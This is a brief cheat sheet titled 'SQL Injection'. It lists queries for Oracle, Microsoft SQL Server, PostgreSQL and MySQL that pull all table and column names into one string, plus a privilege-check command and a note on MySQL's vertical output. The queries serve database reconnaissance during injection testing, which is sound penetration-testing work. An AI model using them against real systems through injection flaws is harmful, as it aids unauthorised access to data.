SQL Injection
Extract table and column names
Oracle
SELECT LISTAGG(table_name, ',') FROM all_tables
SELECT LISTAGG(column_name, ',') FROM all_tab_columns
WHERE table_name = 'TABLE-NAME-HERE'
Microsoft
SELECT STRING_AGG(table_name, CHAR(44)) FROM information_schema.tables
SELECT STRING_AGG(column_name, CHAR(44)) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL
SELECT STRING_AGG(table_name, ',') FROM information_schema.tables
SELECT STRING_AGG(column_name, ',') FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
MySQL
SELECT GROUP_CONCAT(table_name) FROM information_schema.tables
SELECT GROUP_CONCAT(column_name) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
References: portswigger.net - cheatsheet.
Privileges
MySQL
SHOW GRANTS;
Others
MySQL
Use --vertical to enable the vertical output format, or end the query with \G, for example: SELECT * FROM users \G
> SELECT * FROM city WHERE countrycode='AUT';
*************************** 1. row ***************************
ID: 1523
Name: Wien
CountryCode: AUT
District: Wien
Info: {"Population": 1608144}
Source: dev.mysql.com.